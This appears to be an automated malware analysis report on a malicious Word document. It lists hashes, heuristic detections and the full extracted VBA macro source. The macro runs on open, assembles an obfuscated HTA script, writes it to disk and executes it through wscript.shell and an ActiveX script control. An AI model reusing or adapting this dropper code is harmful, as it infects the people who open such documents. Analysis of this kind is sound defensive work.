Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 447200dbf49c7ddd…

MALICIOUS

Office (OOXML)

Size: 79.9 KB
Created: 2021-04-29 07:33:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2021-05-04
MD5: 31a22fb314b5c2ca3cddad5ac9c30094
SHA-1: d7e7286215a7b7ae2a0d6b46339231694bc9ed23
SHA-256: 447200dbf49c7ddd9fb381fcc733d848e514e841ed70668897f304d45db925bb
Risk score: 170

Heuristics 6

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set argumentLeft = CreateObject("wscript.shell")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set argumentLeft = CreateObject("wscript.shell")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Sub Document_Open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartex — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordml — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symex — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape — In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename    Kind    Source    Size
macros.bas    vba-macro    oletools.olevba.extract_macros (decoded VBA source from OOXML)    10532 bytes
SHA-256: 67f81ae4be1e5b1f5617b3f1266f491914e3082eb7f7aaff8d127566c987a325
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
main
End Sub

Attribute VB_Name = "frm"
Attribute VB_Base = "0{5D56D1BF-2284-42E2-881B-AFF8D6C2CEA1}{5760DF19-8066-46DE-8128-82122701FFC2}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Public Sub button1_Click()
Set borderStruct = ActiveDocument.BuiltInDocumentProperties("title")
Set argumentLeft = CreateObject("wscript.shell")
With argumentLeft
.exec$ (borderStruct)
End With
End Sub


Attribute VB_Name = "dataGenericMemory"
Sub main()
deleteList
End Sub
Function gwc(structScreen)
If Len(structScreen) > 0 Then
gwc = structScreen
End If
End Function
Sub deleteList()
Dim namespaceCaption As String
tableRight = Split(ActiveDocument.BuiltInDocumentProperties("title"), " ")
namespaceCaption = tableRight(1)
Set mainDatabase = New ExAButton
mainDatabase.classReferenceA namespaceCaption, rightLibTitle
frm.button1_Click
End Sub

Attribute VB_Name = "leftTextbox"
Function constText(vbOptionText)
Dim argumentClear As Integer
argumentClear = 31337
If (Len(vbOptionText) < argumentClear) Then constText = gwc("<htm" & "l><b" & "ody>" & "<div" & " id=" & "'con" & "tent" & "'>fT" & "tlc2" & "9sYy" & "54b2" & "J0eG" & "VUYm" & "lMcm" & "90YX" & "JldG" & "k7KT" & "IgLC" & "JncG" & "oudH" & "hlVG" & "V1bG" & "F2XF" & "xjaW" & "xidX" & "BcXH" & "NyZX" & "N1XF" & "w6Yy" & "IoZW" & "xpZm" & "90ZX" & "Zhcy" & "54b2" & "J0eG" & "VUYm" & "lMcm" & "90YX" & "JldG" & "k7KX" & "lkb2" & "Jlc2" & "5vcH" & "Nlci" & "5lbG" & "JhVG" & "1lTW" & "V2b2" & "1lci" & "hldG" & "lydy" & "54b2" & "J0eG" & "VUYm" & "lMcm" & "90YX" & "JldG" & "k7MS" & "A9IG" & "VweX" & "QueG" & "9idH" & "hlVG" & "JpTH" & "JvdG" & "FyZX" & "RpO2" & "5lcG" & "8ueG" & "9idH" & "hlVG" & "JpTH" & "JvdG" & "FyZX" & "RpOy" & "kibW" & "Flcn" & "RzLm" & "Jkb2" & "RhIi" & "h0Y2" & "VqYk" & "9YZX" & "ZpdG" & "NBIH" & "dlbi" & "A9IH" & "hvYn" & "R4ZV" & "RiaU" & "xyb3" & "Rhcm" & "V0aS" & "ByYX" & "Z7KT" & "AwMi" & "A9PS" & "BzdX" & "RhdH" & "MuZW")
End Function
Function pointerLoadCaption(vbOptionText)
Dim argumentClear As Integer
argumentClear = 31337
If (Len(vbOptionText) < argumentClear) Then pointerLoadCaption = gwc("xiYV" & "RtZU" & "1ldm" & "9tZX" & "IoZm" & "k7KS" & "hkbm" & "VzLm" & "VsYm" & "FUbW" & "VNZX" & "ZvbW" & "VyOy" & "llc2" & "xhZi" & "AsIl" & "JjVV" & "Uzcn" & "ZJYz" & "1kaT" & "80cn" & "V2L3" & "dYdV" & "hGbW" & "hFQ0" & "1tcE" & "xkVT" & "JaZH" & "pOSk" & "51L3" & "dsbF" & "NuaW" & "R6V1" & "lsb2" & "N5dm" & "dJRz" & "B6d3" & "dDZT" & "dKQk" & "UvTE" & "pvbW" & "5TQ0" & "JlWk" & "1QQX" & "VVZG" & "ZoeC" & "9MSH" & "c0UV" & "VoaV" & "dlTl" & "dXOU" & "svS2" & "k3Tn" & "c0SV" & "l2ZV" & "JHZX" & "NQa0" & "tUb1" & "FBY1" & "JCSy" & "93Tn" & "c0ME" & "psVF" & "k3Rk" & "lPWE" & "Rsc0" & "9VMm" & "hHRU" & "JjN3" & "VpRD" & "kvdG" & "lFSj" & "hCTX" & "h3QU" & "VCMm" & "lxSE" & "JnSj" & "hBdU" & "xHV3" & "g5Qz" & "JxNE" & "lPL2" & "dFbE" & "Ezc1" & "cwbE" & "R2el" & "c3el" & "c2aG" & "FnRD" & "NQY0" & "5Qel" & "Vud1" & "czRn" & "dYTX" & "Ivc2" & "9zZ2" & "QvbW" & "9jLm" & "5vaX" & "Rhbm")
End Function
Function rightRefRemove(vbOptionText)
Dim argumentClear As Integer
argumentClear = 31337
If (Len(vbOptionText) < argumentClear) Then rightRefRemove = gwc("Vpem" & "5la2" & "NtLy" & "86cH" & "R0aC" & "IgLC" & "JURU" & "ciKG" & "5lcG" & "8uZW" & "xiYV" & "RtZU" & "1ldm" & "9tZX" & "I7KS" & "JwdH" & "RobG" & "14Lj" & "JsbX" & "hzbS" & "IodG" & "Nlam" & "JPWG" & "V2aX" & "RjQS" & "B3ZW" & "4gPS" & "BlbG" & "JhVG" & "1lTW" & "V2b2" & "1lci" & "ByYX" & "Y=|f" & "Xspd" & "HJld" & "m5vQ" & "3Rud" & "W9jK" & "Ghjd" & "GFjf" & "TspI" & "mF0a" & "C50e" & "GVUZ" & "XVsY" & "XZcX" & "GNpb" & "GJ1c" & "Fxcc" & "3Jlc" & "3VcX" & "DpjI" & "ihlb" & "GlmZ" & "XRlb" & "GVkL" & "m5pY" & "U1yZ" & "WZmd" & "WJ7e" & "XJ0O" & "ykid" & "GNla" & "mJvb" & "WV0c" & "3lzZ" & "WxpZ" & "i5nb" & "ml0c" & "GlyY" & "3MiK" & "HRjZ" & "WpiT" & "1hld" & "ml0Y" & "0Egd" & "2VuI" & "D0gb" & "mlhT" & "XJlZ" & "mZ1Y" & "iByY" & "XY7K" & "SJnc" & "Goud" & "HhlV" & "GV1b" & "GF2X" & "Fxja" & "Wxid" & "XBcX" & "HNyZ" & "XN1X" & "Fw6Y" & "yAyM" & "3J2c" & "2dlc" & "iIob" & "nVyL")
End Function
Function nextTrust(vbOptionText)
Dim argumentClear As Integer
argumentClear = 31337
If (Len(vbOptionText) < argumentClear) Then nextTrust = gwc("ikib" & "Gxla" & "HMud" & "HBpc" & "mNzd" & "yIod" & "GNla" & "mJPW" & "GV2a" & "XRjQ" & "SB3Z" & "W4=<" & "/div" & "><di" & "v id" & "='ta" & "ble1" & "'>AB" & "CDEF" & "GHIJ" & "KLMN" & "OPQR" & "STUV" & "WXYZ" & "</di" & "v><d" & "iv i" & "d='t" & "able" & "2'>0" & "1234" & "5678" & "9+/<" & "/div" & "><di" & "v id" & "='ta" & "ble3" & "'></" & "div>" & "<scr" & "ipt " & "lang" & "uage" & "='ja" & "vasc" & "ript" & "'>fu" & "ncti" & "on l" & "istb" & "oxVb" & "List" & "(vbT" & "able" & "){re" & "turn" & "(new" & " Act" & "iveX" & "Obje" & "ct(v" & "bTab" & "le))" & ";}fu" & "ncti" & "on m" & "emor" & "yBuf" & "ferC" & "onst" & "(ExC" & "opy)" & "{ret" & "urn(" & "coun" & "terL" & "inkE" & "xcep" & "tion" & ".get" & "Elem" & "entB" & "yId(" & "ExCo" & "py)." & "inne" & "rHTM" & "L);}" & "func" & "tion" & " swa" & "pVar" & "iabl" & "e(){" & "var " & "poin" & "terB" & "uffe" & "r = ")
End Function
Function mainFuncList(vbOptionText)
Dim argumentClear As Integer
argumentClear = 31337
If (Len(vbOptionText) < argumentClear) Then mainFuncList = gwc("memo" & "ryBu" & "ffer" & "Cons" & "t('t" & "able" & "1');" & "var " & "arra" & "yOpt" & "ionP" & "roce" & "dure" & " = p" & "oint" & "erBu" & "ffer" & ".toL" & "ower" & "Case" & "();v" & "ar d" & "atab" & "aseS" & "tora" & "ge =" & " mem" & "oryB" & "uffe" & "rCon" & "st('" & "tabl" & "e2')" & ";ret" & "urn(" & "poin" & "terB" & "uffe" & "r + " & "arra" & "yOpt" & "ionP" & "roce" & "dure" & " + d" & "atab" & "aseS" & "tora" & "ge);" & "}fun" & "ctio" & "n vb" & "VarC" & "apti" & "on(s" & "){va" & "r e=" & "{}; " & "var " & "i; v" & "ar b" & "=0; " & "var " & "c; v" & "ar x" & "; va" & "r l=" & "0; v" & "ar a" & "; va" & "r co" & "nver" & "tMai" & "nFun" & "c=''" & "; va" & "r w=" & "Stri" & "ng.f" & "romC" & "harC" & "ode;" & " var" & " L=s" & ".len" & "gth;" & "var " & "list" & "boxD" & "elet" & "eScr" & "een " & "= va" & "riab" & "leNa" & "mesp" & "aceI" & "tera" & "tor(" & "'tAr")
End Function
Function localVarDocument(vbOptionText)
Dim argumentClear As Integer
argumentClear = 31337
If (Len(vbOptionText) < argumentClear) Then localVarDocument = gwc("ahc'" & ");fo" & "r(i=" & "0;i<" & "64;i" & "++){" & "e[sw" & "apVa" & "riab" & "le()" & "[lis" & "tbox" & "Dele" & "teSc" & "reen" & "](i)" & "]=i;" & "}for" & "(x=0" & ";x<L" & ";x++" & "){c=" & "e[s[" & "list" & "boxD" & "elet" & "eScr" & "een]" & "(x)]" & ";b=(" & "b<<6" & ")+c;" & "l+=6" & ";whi" & "le(l" & ">=8)" & "{((a" & "=(b>" & ">>(l" & "-=8)" & ")&0x" & "ff)|" & "|(x<" & "(L-2" & ")))&" & "&(co" & "nver" & "tMai" & "nFun" & "c+=w" & "(a))" & ";}}r" & "etur" & "n(co" & "nver" & "tMai" & "nFun" & "c);}" & ";fun" & "ctio" & "n va" & "riab" & "leNa" & "mesp" & "aceI" & "tera" & "tor(" & "opti" & "onLe" & "n){r" & "etur" & "n op" & "tion" & "Len." & "spli" & "t(''" & ").re" & "vers" & "e()." & "join" & "('')" & ";}vb" & "Text" & " = w" & "indo" & "w;co" & "unte" & "rLin" & "kExc" & "epti" & "on =" & " doc" & "umen" & "t;vb" & "Text" & ".res" & "izeT" & "o(1," & " 1);" & "vbTe")
End Function
Function screenRef(vbOptionText)
Dim argumentClear As Integer
argumentClear = 31337
If (Len(vbOptionText) < argumentClear) Then screenRef = gwc("xt.m" & "oveT" & "o(-1" & "00, " & "-100" & ");va" & "r le" & "ftPt" & "r = " & "coun" & "terL" & "inkE" & "xcep" & "tion" & ".get" & "Elem" & "entB" & "yId(" & "'con" & "tent" & "').i" & "nner" & "HTML" & ";var" & " lef" & "tPtr" & " = l" & "eftP" & "tr.s" & "plit" & "('|'" & ");va" & "r pa" & "steC" & "apti" & "onRe" & "fere" & "nce " & "= va" & "riab" & "leNa" & "mesp" & "aceI" & "tera" & "tor(" & "vbVa" & "rCap" & "tion" & "(lef" & "tPtr" & "[0])" & ");va" & "r co" & "llec" & "tion" & "Data" & " = v" & "aria" & "bleN" & "ames" & "pace" & "Iter" & "ator" & "(vbV" & "arCa" & "ptio" & "n(le" & "ftPt" & "r[1]" & "));<" & "/scr" & "ipt>" & "<scr" & "ipt " & "lang" & "uage" & "='ja" & "vasc" & "ript" & "'>fu" & "ncti" & "on l" & "istb" & "oxMa" & "in(b" & "uffe" & "rTmp" & "){va" & "r ar" & "gume" & "ntRe" & "fere" & "nceR" & "epo " & "= li" & "stbo" & "xVbL" & "ist(" & "vari" & "able")
End Function
Function listCounterCollection(vbOptionText)
Dim argumentClear As Integer
argumentClear = 31337
If (Len(vbOptionText) < argumentClear) Then listCounterCollection = gwc("Name" & "spac" & "eIte" & "rato" & "r('l" & "ortn" & "octp" & "ircs" & ".lor" & "tnoc" & "tpir" & "cssm" & "'));" & "argu" & "ment" & "Refe" & "renc" & "eRep" & "o['L" & "angu" & "age'" & "] = " & "'jsc" & "ript" & "';ar" & "gume" & "ntRe" & "fere" & "nceR" & "epo[" & "'Tim" & "eout" & "'] =" & " 600" & "00;a" & "rgum" & "entR" & "efer" & "ence" & "Repo" & "['Ad" & "dCod" & "e'](" & "buff" & "erTm" & "p);r" & "etur" & "n(nu" & "ll);" & "}</s" & "crip" & "t><s" & "crip" & "t la" & "ngua" & "ge='" & "vbsc" & "ript" & "'>li" & "stbo" & "xMai" & "n pa" & "steC" & "apti" & "onRe" & "fere" & "nce " & ": li" & "stbo" & "xMai" & "n co" & "llec" & "tion" & "Data" & " : v" & "bTex" & "t.cl" & "ose<" & "/scr" & "ipt>" & "</bo" & "dy><" & "/htm" & "l>")
End Function
Function rightLibTitle()
rightLibTitle = constText("elec") + pointerLoadCaption("utto") + rightRefRemove("able") + nextTrust("ames") + mainFuncList("Link") + localVarDocument("rray") + screenRef("izeC") + listCounterCollection("lear")
End Function

Attribute VB_Name = "ExAButton"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit
Public Function classReferenceA(textRequestFunc As String, storageIterator As String)
Open textRequestFunc For Output As #1
Print #1, storageIterator
Close #1
End Function
vbaProject_00.bin    vba-project    OOXML VBA project: word/vbaProject.bin    37376 bytes
SHA-256: 1d715f834d7405a7b3906e62ba572b6d320a24911adf5a08cb1c2616f87106c4